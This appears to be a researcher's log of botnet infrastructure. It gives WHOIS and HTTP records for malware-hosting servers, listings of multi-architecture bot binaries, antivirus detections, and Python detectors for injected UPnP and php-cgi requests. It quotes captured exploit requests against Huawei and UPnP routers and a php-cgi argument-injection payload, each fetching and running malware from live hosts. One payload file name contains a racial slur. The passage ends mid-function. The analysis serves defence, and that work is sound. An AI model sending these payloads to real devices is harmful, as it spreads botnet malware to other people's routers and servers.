[   ]       bot.mips                2023-03-20 12:21  34K  
[   ]       db0fa4b8db0333367e9b..> 2023-03-17 06:26  81K  
[   ]       db0fa4b8db0333367e9b..> 2023-03-17 06:26  33K  
[   ]       db0fa4b8db0333367e9b..> 2023-03-17 06:26  29K  
[   ]       db0fa4b8db0333367e9b..> 2023-03-17 06:26  37K  
[   ]       db0fa4b8db0333367e9b..> 2023-03-17 06:26  57K  
[   ]       db0fa4b8db0333367e9b..> 2023-03-17 06:26  34K  
[   ]       db0fa4b8db0333367e9b..> 2023-03-17 06:26  78K  
[   ]       db0fa4b8db0333367e9b..> 2023-03-17 06:26  34K  
[   ]       db0fa4b8db0333367e9b..> 2023-03-17 06:26  35K  
[   ]       db0fa4b8db0333367e9b..> 2023-03-17 06:26  31K  
[   ]       db0fa4b8db0333367e9b..> 2023-03-17 06:26  73K  
[   ]       db0fa4b8db0333367e9b..> 2023-03-17 06:26  81K  
[   ]       db0fa4b8db0333367e9b..> 2023-03-17 06:26  32K  
[   ]       wget.sh                 2023-03-20 19:53 9.8K  
[   ]       wwgget.sh               2023-03-20 19:53 9.8K  
═════════════════════════════════════════════════════════════════════

85.217.144.250

inetnum:        85.217.144.0 - 85.217.144.255
netname:        SERVERION_BV-NET
org:            ORG-DCB8-RIPE
country:        NL
admin-c:        EA7138-RIPE
tech-c:         EA7138-RIPE
abuse-c:        AR63171-RIPE
status:         ASSIGNED PA
mnt-by:         MNT-NETERRA
mnt-routes:     lir-us-delis-1-MNT
mnt-domains:    lir-us-delis-1-MNT
mnt-routes:     mnt-nl-descapital-1
mnt-domains:    mnt-nl-descapital-1
created:        2023-02-23T09:09:04Z
last-modified:  2023-02-23T10:08:54Z
source:         RIPE

organisation:   ORG-DCB8-RIPE
org-name:       Des Capital B.V.
country:        NL
org-type:       LIR
address:        Krammer 8
address:        3232HE
address:        Brielle
address:        NETHERLANDS
$ curl -i http://85.217.144.250
HTTP/1.1 403 Forbidden
Date: Thu, 30 Mar 2023 23:46:34 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Thu, 16 Oct 2014 13:20:58 GMT
ETag: "1321-5058a1e728280"
Accept-Ranges: bytes
Content-Length: 4897
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
		<title>Apache HTTP Server Test Page powered by CentOS</title>
		<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!-- Bootstrap -->
    <link href="/noindex/css/bootstrap.min.css" rel="stylesheet">
    <link rel="stylesheet" href="noindex/css/open-sans.css" type="text/css" />
Index of /hiddenbin

   [ICO]          Name        Last modified   Size Description
══════════════════════════════════════════════════════════════
[PARENTDIR] Parent Directory                     -  
[   ]       boatnet.arc      2023-03-05 00:57 105K  
[   ]       boatnet.arm      2023-03-05 00:57  22K  
[   ]       boatnet.arm5     2023-03-05 00:57  18K  
[   ]       boatnet.arm6     2023-03-05 00:57  27K  
[   ]       boatnet.arm7     2023-03-05 00:57  46K  
[   ]       boatnet.m68k     2023-03-05 00:57  54K  
[   ]       boatnet.mips     2023-03-05 00:57  23K  
[   ]       boatnet.mpsl     2023-03-05 00:57  24K  
[   ]       boatnet.ppc      2023-03-05 00:57  21K  
[   ]       boatnet.sh4      2023-03-05 00:57  49K  
[   ]       boatnet.spc      2023-03-05 00:57  57K  
[   ]       boatnet.x86      2023-03-05 00:57  21K  
══════════════════════════════════════════════════════════════

43.142.33.164:8888

inetnum:        43.142.0.0 - 43.142.255.255
netname:        TENCENT-CN
descr:          Tencent Cloud Computing (Beijing) Co., Ltd
descr:          Floor 6, Yinke Building, 38 Haidian St, Haidian District
country:        CN
org:            ORG-TCCC1-AP
admin-c:        TCA15-AP
tech-c:         TCA15-AP
status:         ALLOCATED PORTABLE
abuse-c:        AT992-AP
remarks:        --------------------------------------------------------
remarks:        To report network abuse, please contact mnt-irt
remarks:        For troubleshooting, please contact tech-c and admin-c
remarks:        Report invalid contact via www.apnic.net/invalidcontact
remarks:        --------------------------------------------------------
mnt-by:         APNIC-HM
mnt-lower:      MAINT-TENCENT-CN
mnt-routes:     MAINT-TENCENT-CN
mnt-irt:        IRT-TENCENT-CN
last-modified:  2021-12-14T05:38:16Z
source:         APNIC

irt:            IRT-TENCENT-CN
address:        Floor 6, Yinke Building, 38 Haidian St, Haidian District, Beijing Beijing 100080
e-mail:         tencent_noc@tencent.com
abuse-mailbox:  tencent_noc@tencent.com
admin-c:        TCA15-AP
tech-c:         TCA15-AP
auth:           # Filtered
remarks:        tencent_noc@tencent.com was validated on 2023-03-16
mnt-by:         MAINT-COMSENZ1-CN
last-modified:  2023-03-16T07:06:37Z
source:         APNIC

HFS /
Messages

User
                                         Login
Folder
[IMG] Home
                             0 folders, 2 files, 1.6 Mbytes
                                         Search
                                ________________ [ go ]
Where to search (X) this folder and sub-folders
( ) this folder only
( ) entire server
Select
                                    All Invert Mask

                                    0 items selected

Actions
                                    Archive Get list
Server information HttpFileServer 2.3k
Server time: 2023/3/31 8:19:38
Server uptime: (28 days) 12:33:35

Name.extension      Size       Timestamp      Hits
[ ] [IMG] LinuxTF    1.3 MB   2023/3/28 23:21:01 4
[ ] [IMG] Server.exe 287.0 KB 2023/3/28 18:38:35 2275

Interesting one…

LinuxTF:    ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not stripped
Server.exe: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
LinuxTF: Unix.Trojan.Elknot-2 FOUND
Server.exe: Win.Dropper.Gh0stRAT-7696262-0 FOUND

45.95.146.26

inetnum:        45.95.146.0 - 45.95.146.255
netname:        ALSYCON-CUSTOMERS
org:            ORG-AB247-RIPE
descr:          Alsycon B.V. | VPS - Dedicated Servers - Colocation
descr:          www.alsycon.nl - info@alsycon.nl
country:        NL
admin-c:        AB39270-RIPE
tech-c:         AB39270-RIPE
status:         ASSIGNED PA
mnt-by:         Alsycon-BV
created:        2019-07-10T10:43:00Z
last-modified:  2020-09-27T15:34:25Z
source:         RIPE

organisation:   ORG-AB247-RIPE
org-name:       Alsycon B.V.
country:        NL
org-type:       LIR
address:        Bruynvisweg 11
address:        1531 AX
address:        Wormer
address:        NETHERLANDS
phone:          +31224712026
abuse-c:        ACRO31910-RIPE
mnt-by:         RIPE-NCC-HM-MNT
mnt-by:         Alsycon-BV
mnt-ref:        Alsycon-BV
mnt-ref:        SpectraIP
mnt-ref:        MNT-HOSTUS
created:        2019-05-13T14:08:46Z
last-modified:  2021-07-28T21:55:27Z
source:         RIPE # Filtered

Interesting:

address:        Wormer
address:        NETHERLANDS

Thinking back to w0rmer…

$ curl -i http://45.95.146.26/
HTTP/1.1 200 OK
Date: Sun, 30 Apr 2023 20:26:12 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Mon, 17 Apr 2023 23:17:18 GMT
ETag: "0-5f990646c86cf"
Accept-Ranges: bytes
Content-Length: 0
Content-Type: text/html; charset=UTF-8
$ curl -i http://45.95.146.26/pedalcheta/
HTTP/1.1 200 OK
Date: Sun, 30 Apr 2023 20:26:29 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Thu, 27 Apr 2023 22:08:53 GMT
ETag: "0-5fa589a1ad34b"
Accept-Ranges: bytes
Content-Length: 0
Content-Type: text/html; charset=UTF-8

85.217.144.207

$ curl -i http://85.217.144.207
HTTP/1.1 403 Forbidden
Date: Sun, 30 Apr 2023 21:50:05 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Thu, 16 Oct 2014 13:20:58 GMT
ETag: "1321-5058a1e728280"
Accept-Ranges: bytes
Content-Length: 4897
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
		<title>Apache HTTP Server Test Page powered by CentOS</title>
		<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

    <!-- Bootstrap -->
    <link href="/noindex/css/bootstrap.min.css" rel="stylesheet">
    <link rel="stylesheet" href="noindex/css/open-sans.css" type="text/css" />
Index of /bins

   [ICO]          Name        Last modified   Size Description
══════════════════════════════════════════════════════════════
[PARENTDIR] Parent Directory                     -  
[   ]       ah               2023-04-28 17:39  419  
[   ]       arm              2023-04-28 17:39  53K  
[   ]       arm5             2023-04-28 17:39  53K  
[   ]       arm6             2023-04-28 17:39  63K  
[   ]       arm7             2023-04-28 17:39 125K  
[   ]       jklarm           2023-04-28 17:39  53K  
[   ]       jklarm5          2023-04-28 17:39  53K  
[   ]       jklarm6          2023-04-28 17:39  63K  
[   ]       jklarm7          2023-04-28 17:39 125K  
[   ]       jklm68k          2023-04-28 17:39  53K  
[   ]       jklmips          2023-04-28 17:39  70K  
[   ]       jklmpsl          2023-04-28 17:39  71K  
[   ]       jklppc           2023-04-28 17:39  53K  
[   ]       jklspc           2023-04-28 17:39  55K  
[   ]       jklx86           2023-04-28 17:39  49K  
[   ]       m68k             2023-04-28 17:39  53K  
[   ]       mips             2023-04-28 17:39  70K  
[   ]       mpsl             2023-04-28 17:39  71K  
[   ]       nabarm           2023-04-28 17:39  33K  
[   ]       nabarm5          2023-04-28 17:39  33K  
[   ]       nabarm6          2023-04-28 17:39  45K  
[   ]       nabarm7          2023-04-28 17:39 105K  
[   ]       nabm68k          2023-04-28 17:39  35K  
[   ]       nabmips          2023-04-28 17:39  46K  
[   ]       nabmpsl          2023-04-28 17:39  46K  
[   ]       nabppc           2023-04-28 17:39  33K  
[   ]       nabspc           2023-04-28 17:39  37K  
[   ]       nabx86           2023-04-28 17:39  33K  
[   ]       ppc              2023-04-28 17:39  53K  
[   ]       sh               2023-04-28 17:39  419  
[   ]       spc              2023-04-28 17:39  55K  
[   ]       u                2023-04-28 17:39  47K  
[   ]       x86              2023-04-28 17:39  49K  
══════════════════════════════════════════════════════════════
ah:      ASCII text
arm:     ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, stripped
arm5:    ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, stripped
arm6:    ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
arm7:    ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, with debug_info, not stripped
jklarm:  ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, stripped
jklarm5: ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, stripped
jklarm6: ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
jklarm7: ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, with debug_info, not stripped
jklm68k: ELF 32-bit MSB executable, Motorola m68k, 68020, version 1 (SYSV), statically linked, stripped
jklmips: ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
jklmpsl: ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
jklppc:  ELF 32-bit MSB executable, PowerPC or cisco 4500, version 1 (SYSV), statically linked, stripped
jklspc:  ELF 32-bit MSB executable, SPARC, version 1 (SYSV), statically linked, stripped
jklx86:  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
m68k:    ELF 32-bit MSB executable, Motorola m68k, 68020, version 1 (SYSV), statically linked, stripped
mips:    ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
mpsl:    ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
nabarm:  ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, stripped
nabarm5: ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, stripped
nabarm6: ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
nabarm7: ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, with debug_info, not stripped
nabm68k: ELF 32-bit MSB executable, Motorola m68k, 68020, version 1 (SYSV), statically linked, stripped
nabmips: ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
nabmpsl: ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
nabppc:  ELF 32-bit MSB executable, PowerPC or cisco 4500, version 1 (SYSV), statically linked, stripped
nabspc:  ELF 32-bit MSB executable, SPARC, version 1 (SYSV), statically linked, stripped
nabx86:  ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped
ppc:     ELF 32-bit MSB executable, PowerPC or cisco 4500, version 1 (SYSV), statically linked, stripped
sh:      ASCII text
spc:     ELF 32-bit MSB executable, SPARC, version 1 (SYSV), statically linked, stripped
u:       ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
x86:     ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped

31.220.2.52

inetnum:        31.220.0.0 - 31.220.3.255
netname:        BZ-ESCUR1
descr:          KODDOS
country:        BZ
org:            ORG-ES189-RIPE
admin-c:        RL8716-RIPE
tech-c:         RL8716-RIPE
status:         ASSIGNED PA
mnt-by:         TERRATRANSIT-MNT
mnt-lower:      TERRATRANSIT-MNT
mnt-routes:     sc-amarutu-1-mnt
created:        2013-02-05T09:23:50Z
last-modified:  2017-03-17T11:45:04Z
source:         RIPE

organisation:   ORG-ES189-RIPE
org-name:       Amarutu Technology Ltd.
org-type:       OTHER
address:        Level23, One Island East, Westlands Rd
address:        Quarry Bay
address:        Hong Kong
phone:          +852 3750 7973
abuse-c:        KDDS9813-RIPE
mnt-ref:        TERRATRANSIT-MNT
mnt-by:         TERRATRANSIT-MNT
created:        2013-02-05T09:23:38Z
last-modified:  2017-10-30T14:46:54Z
source:         RIPE # Filtered
$ curl -i http://31.220.2.52
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Sun, 30 Apr 2023 21:55:13 GMT
Content-Type: text/html
Content-Length: 10918
Last-Modified: Mon, 24 Apr 2023 17:05:14 GMT
Connection: keep-alive
ETag: "6446b6ca-2aa6"
Accept-Ranges: bytes

141.98.10.75

inetnum:        141.98.70.0 - 141.98.71.255
netname:        Segna-Technologies
org:            ORG-ST305-RIPE
descr:          Segna Technologies Virginia
country:        US
geoloc:         39.022820 -77.454047
admin-c:        SR15045-RIPE
tech-c:         SR15045-RIPE
status:         ASSIGNED PA
mnt-by:         segna-mnt
created:        2022-01-17T10:36:11Z
last-modified:  2022-01-17T12:42:08Z
source:         RIPE

organisation:   ORG-ST305-RIPE
descr:          Segna Technologies
phone:          +1 307-333-0779
org-name:       Segna Technologies
org-type:       OTHER
address:        1611 E 2nd St Suite # 79, Casper WY 82601
abuse-c:        ACRO38619-RIPE
mnt-ref:        segna-mnt
mnt-by:         segna-mnt
created:        2021-01-26T10:07:39Z
last-modified:  2021-01-26T10:13:40Z
source:         RIPE # Filtered
$ curl -i http://141.98.10.75/
HTTP/1.1 403 Forbidden
Date: Fri, 12 May 2023 01:28:31 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Thu, 16 Oct 2014 13:20:58 GMT
ETag: "1321-5058a1e728280"
Accept-Ranges: bytes
Content-Length: 4897
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
		<title>Apache HTTP Server Test Page powered by CentOS</title>
		<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

141.98.10.75

inetnum:        141.98.10.0 - 141.98.10.255
netname:        LT-HOSTBALTIC-10
country:        LT
admin-c:        PV7242-RIPE
tech-c:         PV7242-RIPE
status:         ASSIGNED PA
mnt-by:         mnt-lt-hostbaltic-1
created:        2019-01-10T13:11:38Z
last-modified:  2019-01-10T13:11:38Z
source:         RIPE

person:         Paulius Vancugovas
address:        Draugystes g. 19
address:        51230
address:        Kaunas
address:        LITHUANIA
phone:          +37067358624
nic-hdl:        PV7242-RIPE
mnt-by:         mnt-lt-hostbaltic-1
created:        2019-01-08T13:14:38Z
last-modified:  2019-01-09T13:14:40Z
source:         RIPE
$ curl -i http://141.98.10.75
HTTP/1.1 403 Forbidden
Date: Sun, 21 May 2023 17:16:26 GMT
Server: Apache/2.4.37 (centos)
Last-Modified: Sun, 27 Jun 2021 23:47:13 GMT
ETag: "30c0b-5c5c7fdeec240"
Accept-Ranges: bytes
Content-Length: 199691
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en">
<head>
  <meta name="generator" content="HTML Tidy for HTML5 for Linux version 5.7.28">
  <title>HTTP Server Test Page powered by CentOS</title>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <link rel="shortcut icon" href="http://www.centos.org/favicon.ico">
  <style type="text/css">

141.98.6.145

inetnum:        141.98.6.0 - 141.98.6.255
netname:        Serverion_BV-NET
country:        NL
org:            ORG-DCB8-RIPE
abuse-c:        SB27731-RIPE
admin-c:        SB27731-RIPE
tech-c:         SB27731-RIPE
status:         ASSIGNED PA
mnt-by:         MNT-MCONSULTING
created:        2022-06-10T08:21:58Z
last-modified:  2022-09-26T14:33:32Z
source:         RIPE
mnt-domains:    mnt-nl-descapital-1
mnt-routes:     mnt-nl-descapital-1
mnt-lower:      mnt-nl-descapital-1

organisation:   ORG-DCB8-RIPE
org-name:       Des Capital B.V.
country:        NL
org-type:       LIR
address:        Krammer 8
address:        3232HE
address:        Brielle
address:        NETHERLANDS
phone:          +31851308338
phone:          +13023803902
admin-c:        AA35882-RIPE
tech-c:         TA7409-RIPE
abuse-c:        AR60082-RIPE
$ curl -i http://141.98.6.145
HTTP/1.1 403 Forbidden
Date: Sun, 21 May 2023 17:25:48 GMT
Server: Apache/2.4.6 (CentOS)
Last-Modified: Thu, 16 Oct 2014 13:20:58 GMT
ETag: "1321-5058a1e728280"
Accept-Ranges: bytes
Content-Length: 4897
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
		<title>Apache HTTP Server Test Page powered by CentOS</title>
		<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
POST /picsdesc.xml HTTP/1.1
Content-Length: 630
Accept-Encoding: gzip, deflate
SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
User-Agent: Hello-World
Connection: keep-alive
<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope//" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding//%22%3E<s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>cd /var/; wget http://141.98.6.145/nigger.mips; chmod +x mips; ./mips</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
POST /cdn-cgi/
User-Agent:
HTTP/1.1 404 Not Found
Server: Apache
Content-Length:
HTTP/1.1 200 OK
POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
Content-Length: 430
Connection: keep-alive
Accept: */*
Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 141.98.6.145 -l /tmp/kh -r /nigger.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
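
The two SOAP calls above carry a shell pipeline in fields that the UPnP schema reserves for a host address or a URL. The following check is an added example written for this page (not the author's tooling): it parses a request body and flags any NewInternalClient/NewRemoteHost that is not an IP address and any NewStatusURL/NewDownloadURL that is not a plain URL. The sample bodies are constructed and use 203.0.113.5 as a placeholder host.

```python
"""Validate the argument fields of UPnP WANIPConnection/WANPPPConnection calls.
Added example for this page, not the author's code; sample bodies are constructed
and use 203.0.113.5 (a documentation address) in place of any real host."""
import ipaddress
import re
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

# Arguments a legitimate call fills with a host address or a URL.  Both captured
# requests above smuggle a shell pipeline through exactly these fields.
ADDRESS_FIELDS = {"NewInternalClient", "NewRemoteHost"}
URL_FIELDS = {"NewStatusURL", "NewDownloadURL"}

URL_RE = re.compile(r"https?://[A-Za-z0-9.\-]+(?::\d{1,5})?(?:/[^\s\"'`;|&$<>]*)?")
SHELL_RE = re.compile(r"[;|&`]|\$\(|\b(?:wget|curl|tftp|chmod|busybox)\b")


def _local_name(tag: str) -> str:
    """Drop the {namespace} prefix ElementTree attaches to qualified tags."""
    return tag.rsplit("}", 1)[-1]


def inspect_soap_body(body: str) -> list[str]:
    """Return one finding per argument whose content the UPnP schema does not
    allow; an empty list means the call looked ordinary."""
    try:
        root = ET.fromstring(body)
    except ET.ParseError as exc:
        return [f"unparseable XML: {exc}"]
    findings: list[str] = []
    for el in root.iter():
        name = _local_name(el.tag)
        text = (el.text or "").strip()
        if name in ADDRESS_FIELDS:
            if text == "":
                continue  # an empty NewRemoteHost is the documented wildcard
            try:
                ipaddress.ip_address(text)
            except ValueError:
                why = "shell pipeline" if SHELL_RE.search(text) else "not an IP address"
                findings.append(f"{name}: {why}: {text[:60]!r}")
        elif name in URL_FIELDS and not URL_RE.fullmatch(text):
            why = "shell pipeline" if SHELL_RE.search(text) else "not a plain URL"
            findings.append(f"{name}: {why}: {text[:60]!r}")
    return findings


def port_mapping_request(internal_client: str) -> str:
    """Build an AddPortMapping body (constructed sample) with the given client field."""
    return (
        '<?xml version="1.0"?>'
        '<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" '
        's:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body>'
        '<u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1">'
        "<NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort>"
        "<NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort>"
        f"<NewInternalClient>{escape(internal_client)}</NewInternalClient>"
        "<NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing"
        "</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration>"
        "</u:AddPortMapping></s:Body></s:Envelope>"
    )


# Constructed sample shaped like the DeviceUpgrade request above (placeholder host).
INJECTED_UPGRADE = (
    '<?xml version="1.0"?>'
    '<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body>'
    '<u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1">'
    "<NewStatusURL>$(/bin/busybox wget -g 203.0.113.5 -l /tmp/kh -r /bot.mips; /tmp/kh)"
    "</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL>"
    "</u:Upgrade></s:Body></s:Envelope>"
)

# Constructed NewInternalClient value shaped like the AddPortMapping capture above.
INJECTED_CLIENT = "cd /var/; wget http://203.0.113.5/bot.mips; chmod +x bot.mips; ./bot.mips"

if __name__ == "__main__":
    for label, body in [("benign", port_mapping_request("192.168.1.20")),
                        ("port mapping", port_mapping_request(INJECTED_CLIENT)),
                        ("upgrade", INJECTED_UPGRADE)]:
        print(label, inspect_soap_body(body) or "clean")
```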

84.54.50.163

inetnum:        84.54.50.0 - 84.54.50.255
netname:        SERVERION_BV-NET
org:            ORG-DCB8-RIPE
country:        NL
admin-c:        EA7138-RIPE
tech-c:         EA7138-RIPE
abuse-c:        AR63171-RIPE
status:         ASSIGNED PA
mnt-by:         MNT-NETERRA
mnt-routes:     lir-us-delis-1-MNT
mnt-domains:    lir-us-delis-1-MNT
mnt-routes:     mnt-nl-descapital-1
mnt-domains:    mnt-nl-descapital-1
created:        2023-02-23T09:09:03Z
last-modified:  2023-02-23T10:08:54Z
source:         RIPE

organisation:   ORG-DCB8-RIPE
org-name:       Des Capital B.V.
country:        NL
org-type:       LIR
address:        Krammer 8
address:        3232HE
address:        Brielle
address:        NETHERLANDS
phone:          +31851308338
phone:          +13023803902
admin-c:        AA35882-RIPE
$ curl -i http://84.54.50.163/
HTTP/1.1 403 Forbidden
Server: nginx/1.14.0 (Ubuntu)
Date: Sun, 21 May 2023 17:29:41 GMT
Content-Type: text/html
Content-Length: 178
Connection: keep-alive

<html>
<head><title>403 Forbidden</title></head>
<body bgcolor="white">
<center><h1>403 Forbidden</h1></center>
<hr><center>nginx/1.14.0 (Ubuntu)</center>
</body>
</html>

scamanje.stresserit.pro

scamanje.stresserit.pro. 60	IN	A	3.141.96.53
scamanje.stresserit.pro. 60	IN	A	3.20.137.44
$ curl -i http://scamanje.stresserit.pro
HTTP/1.1 200 OK
Alt-Svc: h3=":443"; ma=2592000
Server: Caddy
Date: Fri, 18 Aug 2023 04:24:17 GMT
Content-Length: 0
$ curl -i https://scamanje.stresserit.pro
curl: (35) OpenSSL/3.0.9: error:0A000438:SSL routines::tlsv1 alert internal error
$ curl -i scamanje.stresserit.pro/jaws
HTTP/1.1 200 OK
Alt-Svc: h3=":443"; ma=2592000
Server: Caddy
Date: Fri, 18 Aug 2023 04:25:07 GMT
Content-Length: 0

193.41.237.61

Looks cleaned up once I got to it. Seems to be an infected German FiveM server:

POST //%63%67%69%2D%62%69%6E/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1\x0d\x0aHost: -c\x0d\x0aContent-Type: application/x-www-form-urlencoded\x0d\x0aContent-Length: 109\x0d\x0a\x0d\x0a<? system("cd /tmp ; wget http://193.41.237.61/testperl;perl testperl;rm -rf testperl;history -c;clear "); ?>

Decoded:

//cgi-bin/php?-d+allow_url_include=on+-d+safe_mode=off+-d+suhosin.simulation=on+-d+disable_functions=""+-d+open_basedir=none+-d+auto_prepend_file=php://input+-d+cgi.force_redirect=0+-d+cgi.redirect_status_env=0+-d+auto_prepend_file=php://input+-n
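
The decoding above as a reusable check, added here for this page (not the author's code): it reproduces the CGI isindex rule that turns a query string without a raw '=' into php-cgi command-line arguments, then flags the php.ini overrides that make a POST body executable. The sample request is constructed to carry the same arguments as the capture, with every byte percent-encoded the way the attacker did.

```python
"""Decode php-cgi argument injection hidden in a percent-encoded request target.
Added example modelled on the capture above; the sample request is constructed."""
import re
from urllib.parse import unquote

# php.ini overrides that, when accepted on php-cgi's command line, let the POST
# body be executed as PHP.  Each predicate returns True for the dangerous value.
RISKY_DIRECTIVES = {
    "allow_url_include": lambda v: v.lower() in {"on", "1", "true"},
    "auto_prepend_file": lambda v: v.startswith(("php://", "http://", "https://", "data:")),
    "safe_mode": lambda v: v.lower() in {"off", "0"},
    "disable_functions": lambda v: v.strip("\"'") == "",
    "open_basedir": lambda v: v.lower() in {"none", ""},
    "cgi.force_redirect": lambda v: v == "0",
    "cgi.redirect_status_env": lambda v: v == "0",
}
PHP_CGI_PATH = re.compile(r"/cgi-bin/php(?:-cgi)?[0-9.]*$")


def php_cgi_argv(target: str) -> list[str]:
    """Apply the CGI 'isindex' rule: a query string with no raw '=' is split on
    '+' and each decoded word becomes a command-line argument for the script."""
    _path, sep, query = target.partition("?")
    if not sep or "=" in query:
        return []  # an ordinary form query is passed in QUERY_STRING, not argv
    return [unquote(word) for word in query.split("+") if word]


def risky_arguments(argv: list[str]) -> list[str]:
    """List the -d overrides (and -n) that weaken php-cgi's configuration."""
    findings = []
    for i, word in enumerate(argv):
        if word == "-n":
            findings.append("-n (skip php.ini)")
        elif word == "-d" and i + 1 < len(argv):
            key, _, value = argv[i + 1].partition("=")
            check = RISKY_DIRECTIVES.get(key)
            if check and check(value):
                findings.append(f"{key}={value}")
    return findings


def analyze_request_target(target: str) -> dict:
    """Decode the path, derive the argv php-cgi would see, and report findings."""
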